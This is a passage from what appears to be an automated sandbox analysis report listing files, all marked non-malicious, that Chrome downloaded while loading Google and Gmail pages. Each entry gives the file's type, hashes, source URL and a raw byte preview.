                                                                                                                                                                                                                                                                                          Entropy (8bit):7.99444009565784
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:8pJf8lXHzTyT3P9QWCHmzL3WbHPBBWQfIKkydgMbG48B/u:u0lDTyrKWCHeL3OBDwKdmp9u
                                                                                                                                                                                                                                                                                          MD5:1ACA735014A6BB648F468EE476680D5B
                                                                                                                                                                                                                                                                                          SHA1:6D28E3AE6E42784769199948211E3AA0806FA62C
                                                                                                                                                                                                                                                                                          SHA-256:E563F60814C73C0F4261067BD14C15F2C7F72ED2906670ED4076EBE0D6E9244A
                                                                                                                                                                                                                                                                                          SHA-512:808AA9AF5A3164F31466AF4BAC25C8A8C3F19910579CF176033359500C8E26F0A96CDC68CCF8808B65937DC87C121238C1C1B0BE296D4306D5D197A1E4C38E86
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjIUvQ.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2..............X......................................4?HVAR.k.`?STAT..'...J/<.....`..(..Z.0..N.6.$.... .....K..[O;q..w....z.....%.O.t'*.R...*.6.{..@.k......C.B..Z.uU.}..!.".....]jK.`&.\..4...US.......x..C...1g.:.+.?.t<....J...C.p.c..J...........V..H1.6.~..n.]~"R*>..s....7....FE1.S/m....}..<....M..IHB.._8.d.3"......8..t.;f._~X.A.&n.1..t..v...n.._............eS.......!V."v6.xm|M..O.z..,....,...N.1......y^7...^^.$.!.$<V..B....."j..!2..Y"..{w!..Z.[...]H....*M-.*".8j.<..X.[{..UI....ML.J.?4B.....]..4..()^Bi.4iD/..]....../I.-.J[D...........c...)63.U.rFpW5}.9$..2...t..:.MW.c.N...lK...3^......./..v. !...;..v.w./^S...\U....|.......Y9...a.z.....i..$J.U...Ks....0Q*.........iy.....M..@..........&..c.kh.(<.O.....~..#.-.gfw.t...nbo...]0'G.!.2.8....y.K..;%......_).W..?.'.DTR.H....G.Al..d......g>.6..(.."4l...3$...\_.W}..R...\.o........`..q...@XG.wpN......!....&...\.&.....N..5..n......g..bR......HV...s...e..r.0ty&.SW.j.{I...".m .s..T....l....@th:..aM.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 15996, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):15996
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.989012096227512
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:nH4UArsQ/nHYjtuHgovTC+H+b23+kMw/KjK0TQ59u98pgQXk:nYZQjtuHgYGbrMyjDiJXk
                                                                                                                                                                                                                                                                                          MD5:CC536892EABDE0EAEB81493BDA8E189A
                                                                                                                                                                                                                                                                                          SHA1:15C0180AD7BDF9D0F963747447BC9446FC42D2DC
                                                                                                                                                                                                                                                                                          SHA-256:97399A2914C593DA2895D9729AA0170A1956E91EE54CF7550696691949558A37
                                                                                                                                                                                                                                                                                          SHA-512:94F605C4C4FE76EBDB2D5428C6BA69F83B75C65B6932251C0C3E90F92CC1F421FD9F15E81D5985693DC564B8644D90A26DA3E9C63976CF5862ED54D5ED0C4320
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesanstext/v22/5aUu9-KzpRiLCAt4Unrc-xIKmCU5qEp2iw.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......>|..........>...........................<..:..:.`..:.....p..~.....6.$..(. ..>..N.....5xn.u..b.....c..<..Rw.H..q.(.....9A...^.=h.%J...4.\.\.[....[....h.j..AP.....a..]N.o....6.a..uO..R.|o...wO..t....s....^F...Oy....IN^..X...9sg...(;..L.....5.s~...?....%.0.f....b.. ..;.. "k+.v`.....1kq.\mqLp.]|..Z\..O......=.......h..,u.................y.h.o.Z..%.....g#..B......V...3.r....J..>g.-rU?+.3A.....C...... .21..f...Z.......P..o..g\.b... v...6..0...b.....?..-WL...Z2...1..Q./....... ..C..G.^r....O......io;.o..4.<....7.Pm..!.Nu.=..Oc............e.w.g.....,...c...0V.P...R.){..u...>*.fi..S.w.G...-..... $.8......w..hp...T@..Go....).......;.....B.)..p.\.?.-KC.S.5..pX9...'.!.-....R.Sg.>x.o.yP......S....a...m<.+".t%..3x.?3M;....k.....I&I.3g.26...p...}~....X.x..G.<)..k..U....AZ..A@....Cu..Tv{...|v.04H.$Xc..E.)<...!........^..~.7P.u...xH..rX..8O....y.k(...0.p 0.%.U...*Z...%...|LlUJ.]L_...9..AX.$E.$.sa.(v8L!...rc.-....I..W..........^U...@.....3P............M..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.875
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Hnhn:Bn
                                                                                                                                                                                                                                                                                          MD5:BEEDCB4EB0A559E6CE2D1E20D38CB330
                                                                                                                                                                                                                                                                                          SHA1:A04EE9801770C0E81B170D7992EC3735E878AA58
                                                                                                                                                                                                                                                                                          SHA-256:6E9D99B87595B07B10676B68EBE9AA8B63DF7D9A74F59CC91EED60EA1FBDC6EF
                                                                                                                                                                                                                                                                                          SHA-512:BD101CDF7FDF1210127D83CE76E3F6F6F1378259F0A55C112E39C49A9131B8636FB020E07E985B8427A35B62A544F2F7C5F75B11AD69EF2C4AE67A41BD5898B2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAn11VQ7sgCk8RIFDWlIR0c=?alt=proto
                                                                                                                                                                                                                                                                                          Preview:CgkKBw1pSEdHGgA=
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (501)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):993
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2946732421267315
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:E1tXIbtEHvIYWwmqAK/HJ2cNAXzk5vuHM8aJLtMCRWZ4FhQ:E1tXmtEPT6cLAXzk5kaJL+CwYhQ
                                                                                                                                                                                                                                                                                          MD5:BB54A4724507795586291E5D583C861A
                                                                                                                                                                                                                                                                                          SHA1:B4383DFADD4B7EDF30DD830F07D1C91E717235CB
                                                                                                                                                                                                                                                                                          SHA-256:35C3162B611C3AAA72C002B914BE112F207E0F3BCE58A033EC0437D9AAD814E9
                                                                                                                                                                                                                                                                                          SHA-512:AB2A3015BA3EB4AC1951848EB8F4215DE67D1ECBEE99A3E96B913CDBE2E617110580D9A46F47E071A80F7691C696D41D48A79CE45759B8D1599584432A6E2D4B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:var scriptUrl = 'https:\/\/www.youtube.com\/s\/player\/b0557ce3\/www-widgetapi.vflset\/www-widgetapi.js';try{var ttPolicy=window.trustedTypes.createPolicy("youtube-widget-api",{createScriptURL:function(x){return x}});scriptUrl=ttPolicy.createScriptURL(scriptUrl)}catch(e){}var YT;if(!window["YT"])YT={loading:0,loaded:0};var YTConfig;if(!window["YTConfig"])YTConfig={"host":"https://www.youtube.com"};.if(!YT.loading){YT.loading=1;(function(){var l=[];YT.ready=function(f){if(YT.loaded)f();else l.push(f)};window.onYTReady=function(){YT.loaded=1;var i=0;for(;i<l.length;i++)try{l[i]()}catch(e){}};YT.setConfig=function(c){var k;for(k in c)if(c.hasOwnProperty(k))YTConfig[k]=c[k]};var a=document.createElement("script");a.type="text/javascript";a.id="www-widgetapi-script";a.src=scriptUrl;a.async=true;var c=document.currentScript;if(c){var n=c.nonce||c.getAttribute("nonce");if(n)a.setAttribute("nonce",.n)}var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b)})()};.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):547178
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.8841055387993
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:826Zwjigz4YPOyAJpurxfOXxlHee9xu8AGiHyF:826ZwegsYmykQfOGeG8diH
                                                                                                                                                                                                                                                                                          MD5:28D0D2FE6B1CC43F40D112E11B47DABF
                                                                                                                                                                                                                                                                                          SHA1:010BA29FE4CD974AD208FC5D9F1080F5E7C3DBD9
                                                                                                                                                                                                                                                                                          SHA-256:3FB916C972D047648242136F66A6C22926A1BD047657575CDED6DE0F90BF635A
                                                                                                                                                                                                                                                                                          SHA-512:AD6525E175A3EA8C1CA3A0B1DA580E8FA087F36F8FC4A86D0D2A3F0B49A3BCC7B4849571F400F7714589D7ED2351680961B94CB77493092FFCE5519092579566
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/OPytN2BZpLrg-Jf6gRoDo_dJGGBLseMyBv0vo6PAEmzXeEud74RkobzNkzBFJA_uPdIzXocbqka4OaKPqWKyqycMrnHlhzOcICdYs0Gn=rw-e365-w2880
                                                                                                                                                                                                                                                                                          Preview:RIFFbY..WEBPVP8LVY../..D..u!...R.F..._.......WR=I.H..c.....F{......E..eI.%.*.......c..e....fB...I..d.2.'.5O.6+Y..5...:.@v..8...I..,K.eYR.z....r.......RK}..y<`.lw.h.y...~.@dY2C.@.8...S.(........a.....8X.)'..4c;..b;.EkIk.........../Gm.|....9g..h.B..(....lX....4.l.Kz......J.%.;...6.xn.R.RV.....c....a4.....9...}.`m{v.....o...uh.hl.M..=y.P..G.*4..j.........QC....r..P...'v.#(9.%.r66..|dk.>.....^ .%.oJ.....mU.$Yc.#".f...Y..\.y..#.'...!....LA....v..<H...%I....>.f..T..D. ...L.w...m.mm.k.....l.....F...|.{.....m........$.b..E*$.<.S1X....U..#..1.\k...?..Oll.L....l..H.O..3s.{).......X.../...s.^..>.dd}....H...z.c.....s.EI...{0.G.S<13yp......s..j-.%Ir$.-Q.........2..8g.5..*.......YpE.}...[r...#.....$........\k.']....}....+8h.eR..r..s..m.*y$.......oU....q^&...}.P.../...4..?.;f....h.p<U.GI........G...Cw.....#.m.....).y.c...............................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (5196)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5197
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.096394178954414
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:b7BFG5V2BljGtOS3YkViYaOBGGL9mGUCAnuXOo1suYcMM2C:bblKtZ79O7Qln
                                                                                                                                                                                                                                                                                          MD5:C7D60243E96641B21B71CDF43CCA655F
                                                                                                                                                                                                                                                                                          SHA1:DEA5ABE9DE9BDA0B5D895CBB12304F06B37C7006
                                                                                                                                                                                                                                                                                          SHA-256:BFABB86D1D73116C943389CF9AC8231FF6A7AD069250926314ADBDECB14E2BFC
                                                                                                                                                                                                                                                                                          SHA-512:E665804B75F64EF3479F4D96D36F0154479E3A56C6F6D9E24F30E549B1EA96AD0F91CAE562A8D69B388C63ADFDC9D73F63E1EDF23E04192E6426B52A313EE111
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/gmail/about/static-2.0/css/partials/ctas.css?fingerprint=c7d60243e96641b21b71cdf43cca655f
                                                                                                                                                                                                                                                                                          Preview:.ctas{overflow:hidden;text-align:center;text-wrap:balance}.ctas__cta__container{margin:0 auto;display:grid}@media(max-width: calc(600px - 1px)){.ctas__cta__container{padding:0 24px;max-width:600px}}@media(min-width: 600px)and (max-width: calc(1024px - 1px)){.ctas__cta__container{padding:0 min(5vw,72px);max-width:600px}}@media(min-width: 1024px)and (max-width: calc(1440px - 1px)){.ctas__cta__container{padding:0 min(5vw,72px)}}@media(min-width: 1440px){.ctas__cta__container{max-width:1600px}}@media(max-width: calc(600px - 1px)){.ctas__cta__container{--grid-column-gap: 24px}}@media(min-width: 600px)and (max-width: calc(1024px - 1px)){.ctas__cta__container{--grid-column-gap: 24px}}@media(min-width: 1024px)and (max-width: calc(1440px - 1px)){.ctas__cta__container{--grid-column-gap: 44px}}@media(min-width: 1440px){.ctas__cta__container{--grid-column-gap: 64px}}@media(max-width: calc(600px - 1px)){.ctas__cta__container{column-gap:24px}}@media(min-width: 600px)and (max-width: calc(1024px - 1px
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3024
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.916185462769354
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:O/6pWg9H0NjXkHtvihsVU5IwRoCyVM41LpwKXYVMYPvHxeVxJ8rMlESE6L4qzupH:OSR8jXkjVU5Iw/ya41LpRYV5HHRYlK6+
                                                                                                                                                                                                                                                                                          MD5:FBD7BF34502DD9215CC7DB54699DB71F
                                                                                                                                                                                                                                                                                          SHA1:958A5C26E9AF819EB5A3D2F8E68B44B3A2C5F4DF
                                                                                                                                                                                                                                                                                          SHA-256:05BA7CE6F3678221C356348D48A80795BE17E71F526C4234B68E657900ECD4BB
                                                                                                                                                                                                                                                                                          SHA-512:04441C3173B10E3F57984776D3D4B55349093DDB90797C6A1A8A7715779E91FA252F7ACCA7FA168FB550E0096C3E8D1A55649031DAE8AB61FBF0035D5CE05124
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....pHYs.................sRGB.........gAMA......a....eIDATx...L....{/ .(hC..,T.d.m1j2k.l.%....b.LG..Z.....N.K...e).I..d.$.[.T..L.v)...B. ?..=.....p.{.....OB.pc.....z......,^......8..c.....Pk.5.......w~.u9).SvJ&.%......\..'.{6...X.....S.s....$....%y.0s...d..q......v.N....I.%y.T....V\)....t..z!......W....*...+.&....."z........../.E.[.I7X..*.,..br...F.>w.\[.cW.3"..!.1Zp..6*;Y..\.-...>.S..V...k;I....L.C..u....F....3..-@.....d.*1,.!rC...2.N0...c!..............Q.!..r4`.Wk.V..c..t.Q.v~w.m.>.F....7&...Ry.52.#..."........y.J7.+"...y.J'rG....2!I.}.....T....n..H..WY.#..)..Y).....".h...*.7.x.Jz....>t..v..M."....X...7.K..k...(![..*.......*.c....p...9.......DBp..V.-.....?.x...]"S.j.Y.o.O:.&..+..."..R..g......N..nl?G2.'...c1\.TG..S..S.Z#X...7>R.,.I..........K.g.:.....?.F.."X6z..)!'..I....]...a.t ..FFp.....W>.Nb.,.t...j.]..@e..\w..w.t.DB0...#.h.,s.([Sq[....,Z..}....C$...M...J..>.}...1.g..|z..-...t....D.`
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):7450
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9466762875405195
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:v0ydeyEkZzc5EEttyNPp0BorRpMlx8tfRKJRVM1oc:vtEtNGC2rM6KJM1oc
                                                                                                                                                                                                                                                                                          MD5:68B6198D96D08CD134A08B067984494A
                                                                                                                                                                                                                                                                                          SHA1:8A7702B58E6DD86B86318160C128A5236EFB2BBD
                                                                                                                                                                                                                                                                                          SHA-256:6CA243D51F626351B5ADC276A4030B9AE05127C54EE8FDD850AC4D86BFC559E9
                                                                                                                                                                                                                                                                                          SHA-512:41017D4918BA9CC878C9750F9280350D6A88BB12969EFCBA71343D4A3B2176D7B03C5943DC4C4D5451F2F7C8438C3B456ED451BD15A38DB530EB5CDA81EA870E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..yp..y...s......A..@....d..H..I.l."...:U{..d..7Y'..v.[N......,9.....DY.,R.%R..&q..H. .. 8..........`...Ii~US.jt.{._..........'O.<y...'O.<y...s% \....I..@+..,......x.....&~.....4.../..W~.|a.,I..`.....j.......?' &~.:..q.A.0..&.a...!.O...<...B.X..v.n`;.!.B..j'Q.aO...=..dY~..r.../`I...........e.8FK.....[Y.O...\..N..?....f....'..~E...E..w.z.;...,I.../....o.R.4RE:..R?.A...&......GY.....;.".,I.......:......*.N.........P]]..*JKK)........... ..D#.&''........FF...arr.h4J$.!... .".(....>....e9......k.'....}.....:.."..>...2.,YB}}=MMM457.d..DQD....4]..B.A0Z,088..'.........p..y.^....8..LZ.....>Y...x.....$I..}.......4.UU)**.........i.......iF..E.I.E.A@.E4M..........'?...Nq..EDQ....0....,.C....\v..$..l.h...;OUUTU.......Z[[........i...\.......r..Q.........P&.~......j...%I..~.c.j.:G.4".0..........v.~?..f]..0.}..y...8.(.:x...q....G1t...<nw....K..........4t]'..P..m.6V.XA[[.E>...f<..6. .p8.........n...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 407 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):433358
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9752646890716035
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12288:hzjJKSYbNxFA+HOwofDfkAOPKTNVTo3KW592b:hhKSYbvFA+u/zNTNVTAfH2b
                                                                                                                                                                                                                                                                                          MD5:80D1789A0B164DC8CFA6E8EBD8594BA1
                                                                                                                                                                                                                                                                                          SHA1:07B60660052784719D562C124E557CB0ED02FD03
                                                                                                                                                                                                                                                                                          SHA-256:1EBCC1CB966A499369CEB7E392FD1E2CBF5747629CB73EAE0B332CEF47FC0E61
                                                                                                                                                                                                                                                                                          SHA-512:C908AE3B78EC545215FC483F26135F3717643CC849A674612FD74460DE252C50F5CDE7339BBEF33A5C7E39092322E23A2219DDDBB7BBCEDF45F06D5D6981B2B4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............N.!k....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2.. .IDATx..Y.oY~..Y....oM]U..c.;q..K!...H....x.AH(A.#.H. .0...B...C..)@....q<.S..U......{\..k..9H.D2Uv.]R......7|....]?...._.....:../..}..N...m....:....u.j$.Z..],....1IDR.U3q..i..x...f...c...[../..a......(....*SJ......J...;Jja.<.J......{.H3...>.FtVgI..}W%.A.#..z...."x'CM:.s..7M......R.z..F.......g.....w.b%.|..\..m....#t.]..j!_I!o...(%.....^.a.i...m'@..K.C%.3O..x-|.....]).8xw-.1....T&T8)...u..!..${.u~...,..w..V.J..|8...l&...?....._..{..c.y.5>Ro.......}.o.?x...y0-&........!tR..@.\.].T.....J..|..Q./D.|..(q.a......R.. .p7@.].....ri... .g...x.....+........X...".....Q.. ..a...y...s..D....!.D!.J..'...B......)...4m.F.@8.R.G......v..H.&.... . .@...6h...Zk.RR7.Y....x.1..y..6x.s %.s.D.=..w.".A.....a.|.......C.l'.Z.Q.!......)...v..)....j..B..u.m.,..)..!.!xI..A .7.;M.....JJ-:kO].RI../..e..h%7...3..O.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):909
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.651319498790687
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:vGM0cb7aIIbGPHK5OM0Q06bSvveaMbqgqnQHAQk1:vt0EGII6pMr04SOhOgqfH
                                                                                                                                                                                                                                                                                          MD5:7E6F0B676A78D442ED84C9C58889712C
                                                                                                                                                                                                                                                                                          SHA1:7FA3EE919ADB09C312DE5B914530BBEFB6F9F1D4
                                                                                                                                                                                                                                                                                          SHA-256:EF196BF50E065E0431247BEC81E27DAA06AC5B7EFAC6F38287882B9496AFB224
                                                                                                                                                                                                                                                                                          SHA-512:DD2374C5306BBFCC1DF8F65171C4A05AA6B779BA8EE1CA6E564B2C7799C3A649CF367A2576674C183AF4C2ECF4DE32AAD12A09BA0457DE3E5B137A3ADBAB824C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/Iyn9yCCDxgHqvjX5jMZ_looun-kL0Sk60FraoMU5-JQG2WstyK6QNzj3JguQRbvQmWqVBSoO88Oh1kGQAoXMPkIIEF0pQrvXL52XXw=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.............sBIT.....O....ZPLTEGpL...B...C5B...C5<.....B..B..4.S.C5.........4.S...B........4.SB......C5B........B...C54.SP.hb....tRNS.evN.....M..}?.....W.$..L..Y....IDATh.... ..5.9F3..I..57....l.P...7e}..4.f.H$...U...e...E.T.XIV...{..tmS.R..W[...OM..}..)..^..X.i.h..d..P..Vv.:lW[{gs@-q...py....."...D.u.q..C.`.... .v.4#D..*.I...-8...fxg..y..;..3K.9.....?.*-.eyU.......nV.[.RU?=...k.aS...Z>....%.<.'.fb.4T+.[.......=...._,.........#..9.'&y.3]./m...`..AW>..>.T\.m.....;W.v*...Y.W..@$..8.Bl.R.b.......q.ub.c..T.vH.....6..w.!.Z.....< .....9.j"m...@....k......V.wi...]S}.^.s/.....r.6?.......&...l..i....."..p]....z,..T.A...6..@_..F.....g.h....xk..}.Q...T..^D~.qv.>.I/m.._.u{<..q{]Q........jZ..:......e^J...0....Ry)...J.F.u^J..)M.Q.}...{.ML.a.,.L....."=....v&/.8{.1.XI64.....?q..G..h}.m.WG;.......#...\..xsu..D..S...&.....@".H...............IEND.B`.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):22
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.845350936622435
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:a3s5E3C:a3KE3C
                                                                                                                                                                                                                                                                                          MD5:169FD8A4A66188491593969BAD0F4EAB
                                                                                                                                                                                                                                                                                          SHA1:5DCF616EAED4D8DD3537549BFAF997E6726F6450
                                                                                                                                                                                                                                                                                          SHA-256:A0A1F98FCA203B8561519A06BACFDC50E4B3C4A5A71E740DA5B0875BD4FC00D6
                                                                                                                                                                                                                                                                                          SHA-512:9D4A767C5DF1CCBD92F4D19DF6A32079BC498727A4D9DB255A5C424925A589BCD3B858137B48DC07D4097A1AA329194CC2C60AA7CF3F322B7B81D9F24DCA05F2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/glue/cookienotificationbar/config/2b.json?hl=en
                                                                                                                                                                                                                                                                                          Preview:{ "required": false }.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):5861
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.954435489714076
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:7xRpMylJ9V5WXKy+RXvO4xaeLjpso8q0T8qzs8O5+PDwjhBj4bskzhIRwUThees/:7xfMyJ75TRGe1jna8+rPcD2skzhIRLXi
                                                                                                                                                                                                                                                                                          MD5:8FBB7A3499527F1FC92935F48E53BC7D
                                                                                                                                                                                                                                                                                          SHA1:94D59C2F201D4693322B059CC9A5967D7A44C43B
                                                                                                                                                                                                                                                                                          SHA-256:758AAEA9633BEA69708DBD8F34E80E121DA30437B2F2A7A3A046ED595D443E0B
                                                                                                                                                                                                                                                                                          SHA-512:5B90B70290924C0D1954E6EB50290410CF9D9457E863591E0F38D95646B124BBFBD2CCE381F59C8CA74571237A3F78AACFE8A073AE064C6B2B05E7EB91853264
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..k.$Gu....g.>.m..........8...Qd.........!..@..K"%.!G.E."..R.$..........b;....../.......Nw...._wfvw.R......S...SL1..SL1..SL1..S. .$..|....-....v....\9.wmr...|....4...........umr_-.U.....#..j.7..H..)33{X..o.~p...5.....f...A.M.^"6*...~L..m.oouG.y.I..W......|....#.4.Z.l...B......n...Oc!...+7.....\....m..4..$C@m.:.>.6..4}=.....^...o..f....O....=M*]@G....x.l,.V...A7Y&..4`....2...sRFK..........h......-...;$\9..=c .......l.......v9...KO.A....g............z}...%8.R5.d.u........R.,].......SDg.Z.)....iP...I[.}..pk4ES..a.X...*..E...c....:.<95../t"..0.....,U...j....[..W.#..'.....3.8...4.<.t...P....=......}..-..=:g>.|#.'.....l...q+...=.;.&......2s]..........D..Ut..uW.zr..Y.../..]...[....+.gW,.@t..8.*.?.-..H`@<@.2.!.]%.s.........9..g...]B0(...wb/~...z...Hy.x.0=z55....%d.Y8.(..{..`O.,n..... [.Uuw]...8.}.....s....D..Kt....9.....8..n..#....Dv].\.AL.(..."G.....F.......D'..e..9....]..:*>...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (836)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):18858
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.307097362372209
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:bCGXu+nlNIBRMzVKc5PsaxidME50xFP9MdYSi9tlKp:bCK7lwep7sCitKD+YDtlKp
                                                                                                                                                                                                                                                                                          MD5:28973A5C3151BE0D739C2648AA2109A0
                                                                                                                                                                                                                                                                                          SHA1:7D746E7FF84307D23507DB6D5DE40FB6E2C849D6
                                                                                                                                                                                                                                                                                          SHA-256:3B59D4F56AB2E8952CB1FE3642F54369E093291B666F71A376E004AE9BC69F96
                                                                                                                                                                                                                                                                                          SHA-512:FDE267564E707D2E49D7D618AA8D33A7390E2F0967B9A6402B053D9E81A1331E620711FF99744E35F71E72480883DD443EC95B0E192A846A1A71705B35B40749
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:(function(){'use strict';function p(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}}var q=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,c,b){if(a==Array.prototype||a==Object.prototype)return a;a[c]=b.value;return a};.function aa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var c=0;c<a.length;++c){var b=a[c];if(b&&b.Math==Math)return b}throw Error("Cannot find global object");}var r=aa(this);function t(a,c){if(c)a:{var b=r;a=a.split(".");for(var d=0;d<a.length-1;d++){var f=a[d];if(!(f in b))break a;b=b[f]}a=a[a.length-1];d=b[a];c=c(d);c!=d&&c!=null&&q(b,a,{configurable:!0,writable:!0,value:c})}}.t("Symbol",function(a){function c(h){if(this instanceof c)throw new TypeError("Symbol is not a constructor");return new b(d+(h||"")+"_"+f++,h)}function b(h,e){this.g=h;q(this,"description",{configurable:!0,writable:!0,value:e})}if(a)re
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 396 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):46194
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.974616819355414
